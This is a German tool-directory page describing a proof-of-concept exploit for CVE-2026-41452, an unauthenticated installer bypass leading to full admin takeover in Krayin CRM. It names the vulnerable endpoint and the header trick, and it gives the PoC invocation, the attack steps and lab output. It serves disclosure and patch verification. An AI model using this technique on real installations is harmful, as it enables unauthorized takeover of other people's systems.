Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41452-PoC — CVE-2026-41452 — Krayin CRM nicht authentifizierter Installer-Bypass (X-Requested-With) → Admin-Übernahme. Verifiziert: Überschreiben + Login auf 2.2.4, blockiert auf 2.2.5 | Kitploit
Tools/GitHubGitHub/boreas37/cve-2026-41452-poc
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubboreas37/cve-2026-41452-poc

CVE-2026-41452-PoC

CVE-2026-41452 — Krayin CRM nicht authentifizierter Installer-Bypass (X-Requested-With) → Admin-Übernahme. Verifiziert: Überschreiben + Login auf 2.2.4, blockiert auf 2.2.5

Repository anzeigen
3vor 7 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-41452 — Krayin CRM Installer Auth Bypass → Admin-Übernahme

CVSS 9.8 (Critical) · CWE-287 / CWE-306 · Jiva-Writeup · VulnCheck

Zusammenfassung

Der Installer von Krayin CRM legt POST /install/api/admin-config-setup (sowie run-migration, run-seeder) ohne CSRF-Schutz offen (withoutMiddleware('web')-Gruppe). Die globale CanInstall-Middleware blockiert die Route nur für Nicht-AJAX-Anfragen:

root@kitploit:~
// app/Http/Middleware/CanInstall.php
if ($this->isAlreadyInstalled() && ! $request->ajax()) {
    return redirect()->route('admin.dashboard');
}

Das Senden von X-Requested-With: XMLHttpRequest überspringt die Prüfung vollständig. Der Controller führt dann ein updateOrInsert auf den fest verdrahteten primären Administrator (user id=1) mit vom Angreifer bereitgestellten Name/E-Mail/Passwort aus (role_id=1, status=1) → unauthentifizierte vollständige Admin-Übernahme auf einer bereits installierten Instanz.

Betroffen: ≤ 2.2.0 und 2.2.4 (Regression). Behoben: 2.2.1 (e4eb96f5), Regression in 2.2.4 (6a7bc4cc), erneut behoben in 2.2.5 (ea4919a8). master war zum Zeitpunkt der Recherche weiterhin verwundbar.

Exploit

root@kitploit:~
python3 poc_cve-2026-41452.py http://TARGET newadmin [email protected] 'NewPass@123'

Ablauf:

  1. Baseline: Nicht-AJAX-POST → blockiert (302 Redirect) — beweist, dass die Middleware für normale Anfragen funktioniert
  2. AJAX-POST X-Requested-With: XMLHttpRequest → HTTP 200 1 → Admin (id=1) überschrieben
  3. Login unter /admin/login mit den neuen Anmeldedaten → Redirect zu /admin/dashboard
  4. Dashboard wird gerendert → Übernahme bestätigt

Verifizierung (2026-08-12, Docker-Lab, ARM64)

root@kitploit:~
[0] NON-AJAX POST -> HTTP 302 (blocked by CanInstall)        [OK control]
[1] AJAX POST /install/api/admin-config-setup -> HTTP 200 '1' [OK overwrite]
[2] login [email protected] -> HTTP 302 /admin/dashboard          [OK]
[3] GET /admin/dashboard -> HTTP 200 (full dashboard)          [OK]
=== VERDICT: CVE-2026-41452 EXPLOITABLE ===

Vergleich mit behobenem Build: Mit v2.2.5-Dateien liefert derselbe AJAX-POST → HTTP 403 (blockiert).

Auswirkungen

Jede öffentlich erreichbare Krayin-CRM-Installation (v2.2.4 oder ≤2.2.0) kann von einem unauthentifizierten Angreifer mit einer einzigen Anfrage vollständig übernommen werden. Kein CSRF, keine Anmeldedaten, keine Interaktion erforderlich.

Referenzen

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-41452
  • Jiva Security Writeup: https://jivasecurity.com/writeups/krayin-installer-bypass-account-takeover-cve-2026-41452
  • VulnCheck Advisory: https://www.vulncheck.com/advisories/krayin-crm-missing-authentication-via-install-api-admin-config-setup
  • Fix: ea4919a8 (v2.2.5) · Regression: 6a7bc4cc (v2.2.4) · Erster Fix: e4eb96f5 (v2.2.1)
Tool herunterladen